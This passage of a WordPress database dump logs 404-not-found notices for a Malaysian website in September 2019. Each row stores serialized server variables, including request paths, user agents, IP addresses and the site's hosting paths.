Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"31D738D5-9071-4551-BE8D-AEE6403674BD\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZFO74JA@BHzIZKM8@MDFwAAAQw\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.118.43\";s:11:\"REMOTE_PORT\";s:5:\"50006\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZFO74JA@BHzIZKM8@MDFwAAAQw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569804016.1909\";s:12:\"REQUEST_TIME\";s:10:\"1569804016\";}}','notice','2019-09-30 00:40:19','2019-09-30 00:40:16',35495456,37296848,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.118.43'),(27328,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"A5CC5DA3-19D7-4418-A8F8-84110EDB0BC9\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZFL4pdbIPYXuQos2m1CWQAAAZI\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.118.43\";s:11:\"REMOTE_PORT\";s:5:\"49518\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZFL4pdbIPYXuQos2m1CWQAAAZI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569803234.1516\";s:12:\"REQUEST_TIME\";s:10:\"1569803234\";}}','notice','2019-09-30 00:27:17','2019-09-30 00:27:14',35894792,37700792,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.118.43'),(27327,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"66.55.155.44\";s:11:\"REMOTE_PORT\";s:5:\"49580\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZE6jZdbIPYXuQos2m09GgAAAYg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569798798.0294\";s:12:\"REQUEST_TIME\";s:10:\"1569798798\";}}','notice','2019-09-29 23:13:22','2019-09-29 23:13:18',35614504,37425344,'https://bintara.com.my/?page_id=18',1,0,'66.55.155.44'),(27326,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/blog/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:87:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-us; rv:1.7.12) Gecko/20050919 Firefox/1.0.7\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/blog/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZEqZZdbIPYXuQos2m026QAAAZA\";s:12:\"REDIRECT_URL\";s:6:\"/blog/\";s:11:\"REMOTE_ADDR\";s:11:\"13.52.79.38\";s:11:\"REMOTE_PORT\";s:5:\"51492\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:10:\"SCRIPT_URL\";s:6:\"/blog/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZEqZZdbIPYXuQos2m026QAAAZA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569794661.2084\";s:12:\"REQUEST_TIME\";s:10:\"1569794661\";}}','notice','2019-09-29 22:04:24','2019-09-29 22:04:21',35527720,37322928,'https://bintara.com.my/blog/',1,0,'13.52.79.38'),(27324,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/2017/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:87:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-us; rv:1.7.12) Gecko/20050919 Firefox/1.0.7\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/2017/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/2017/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZEqZZdbIPYXuQos2m026AAAAYs\";s:12:\"REDIRECT_URL\";s:6:\"/2017/\";s:11:\"REMOTE_ADDR\";s:11:\"13.52.79.38\";s:11:\"REMOTE_PORT\";s:5:\"51493\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/2017/\";s:10:\"SCRIPT_URL\";s:6:\"/2017/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZEqZZdbIPYXuQos2m026AAAAYs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:12:\"1569794661.2\";s:12:\"REQUEST_TIME\";s:10:\"1569794661\";}}','notice','2019-09-29 22:04:24','2019-09-29 22:04:21',35135904,36932664,'https://bintara.com.my/2017/',1,0,'13.52.79.38'),(27325,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/2018/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:87:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-us; rv:1.7.12) Gecko/20050919 Firefox/1.0.7\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/2018/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/2018/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZEqZc5PbUdT3M9@C7vE8QAAAUc\";s:12:\"REDIRECT_URL\";s:6:\"/2018/\";s:11:\"REMOTE_ADDR\";s:11:\"13.52.79.38\";s:11:\"REMOTE_PORT\";s:5:\"51498\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/2018/\";s:10:\"SCRIPT_URL\";s:6:\"/2018/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZEqZc5PbUdT3M9@C7vE8QAAAUc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569794661.2936\";s:12:\"REQUEST_TIME\";s:10:\"1569794661\";}}','notice','2019-09-29 22:04:24','2019-09-29 22:04:21',35139656,36945376,'https://bintara.com.my/2018/',1,0,'13.52.79.38'),(27323,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/2019/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:87:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-us; rv:1.7.12) Gecko/20050919 Firefox/1.0.7\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/2019/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/2019/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZEqZYJA@BHzIZKM8@P@hgAAAQY\";s:12:\"REDIRECT_URL\";s:6:\"/2019/\";s:11:\"REMOTE_ADDR\";s:11:\"13.52.79.38\";s:11:\"REMOTE_PORT\";s:5:\"51507\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/2019/\";s:10:\"SCRIPT_URL\";s:6:\"/2019/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZEqZYJA@BHzIZKM8@P@hgAAAQY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569794661.2756\";s:12:\"REQUEST_TIME\";s:10:\"1569794661\";}}','notice','2019-09-29 22:04:24','2019-09-29 22:04:21',35132928,36929832,'https://bintara.com.my/2019/',1,0,'13.52.79.38'),(27322,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_ORIGIN\";s:22:\"https://bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.25 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"175.144.198.13\";s:11:\"REMOTE_PORT\";s:5:\"45036\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZEcIpdbIPYXuQos2m0x9wAAAYQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569791010.1687\";s:12:\"REQUEST_TIME\";s:10:\"1569791010\";}}','notice','2019-09-29 21:03:33','2019-09-29 21:03:30',35134776,36939016,'https://bintara.com.my/?page_id=18',1,0,'175.144.198.13'),(27321,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_ORIGIN\";s:22:\"https://bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.25 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.84.121\";s:11:\"REMOTE_PORT\";s:5:\"50979\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZEcHZdbIPYXuQos2m0x9gAAAY0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569791006.0187\";s:12:\"REQUEST_TIME\";s:10:\"1569791006\";}}','notice','2019-09-29 21:03:27','2019-09-29 21:03:26',35135168,36936152,'https://bintara.com.my/?page_id=18',1,0,'166.62.84.121'),(27320,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.14.61 (KHTML, like Gecko) Chrome/53.5.0289.5916 